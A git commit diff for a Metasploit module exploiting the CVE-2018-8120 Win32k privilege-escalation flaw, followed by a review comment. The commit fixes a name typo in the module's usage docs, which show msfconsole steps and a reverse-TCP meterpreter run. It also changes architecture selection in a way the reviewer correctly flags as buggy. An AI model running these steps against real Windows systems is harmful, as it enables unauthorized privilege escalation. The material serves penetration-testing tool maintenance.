updated doc, added x86_64 binary
parent
cdc2918c84
commit
a67122aaf7
Binary file not shown.
|
@ -15,7 +15,7 @@ The update addresses this vulnerability by correcting how Win32k handles objects
|
|||
|
||||
1. Start `msfconsole`
|
||||
2. Get a session
|
||||
3. `use exploit/windows/local/ms18_8120_win32k_privsec`
|
||||
3. `use exploit/windows/local/ms18_8120_win32k_privesc`
|
||||
4. `set SESSION [SESSION]`
|
||||
5. `set LHOST [LHOST]`
|
||||
6. `exploit`
|
||||
|
@ -33,12 +33,12 @@ meterpreter > getuid
|
|||
Server username: zero-PC\zero
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec
|
||||
msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1
|
||||
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc
|
||||
msf exploit(windows/local/ms18_8120_win32k_privesc) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102
|
||||
msf exploit(windows/local/ms18_8120_win32k_privesc) > set LHOST 192.168.1.102
|
||||
LHOST => 192.168.1.102
|
||||
msf exploit(windows/local/ms18_8120_win32k_privsec) > run
|
||||
msf exploit(windows/local/ms18_8120_win32k_privesc) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.102:4444
|
||||
[+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference
|
||||
|
|
|
@ -93,9 +93,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def check_arch
|
||||
sys_arch = sysinfo['Architecture']
|
||||
if sys_arch == ARCH_X86 || (sys_arch == ARCH_X64 && session.arch == ARCH_X86)
|
||||
if sys_arch == ARCH_X86
|
||||
fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
|
||||
|
||||
'CVE-2018-8120x86.exe'
|
||||
elsif sys_arch == ARCH_X64
|
||||
'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
|
||||
|
||||
'CVE-2018-8120x64.exe'
|
||||
else
|
||||
fail_with(Failure::BadConfig, "Invalid architecture")
|
||||
|
|
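Review bot: In the `elsif sys_arch == ARCH_X64` branch, `'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86` is a bare expression whose value is discarded, so the branch evaluates to `'CVE-2018-8120x64.exe'` for every session and the new file name is never the result. If callers use the return value of check_arch (its `end` and call sites are outside the hunk), the choice should be explicit, for example `return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86`. The condition that appears to be replaced, `sys_arch == ARCH_X86 || (sys_arch == ARCH_X64 && session.arch == ARCH_X86)`, also applied the `payload_instance.arch.first == ARCH_X64` check to an x86 session on an x64 host. The new x64 branch has no payload-architecture validation, so a mismatched configuration no longer stops early with `Failure::BadConfig`. A short comment on check_arch listing which host/session combination maps to which file would make the mapping reviewable.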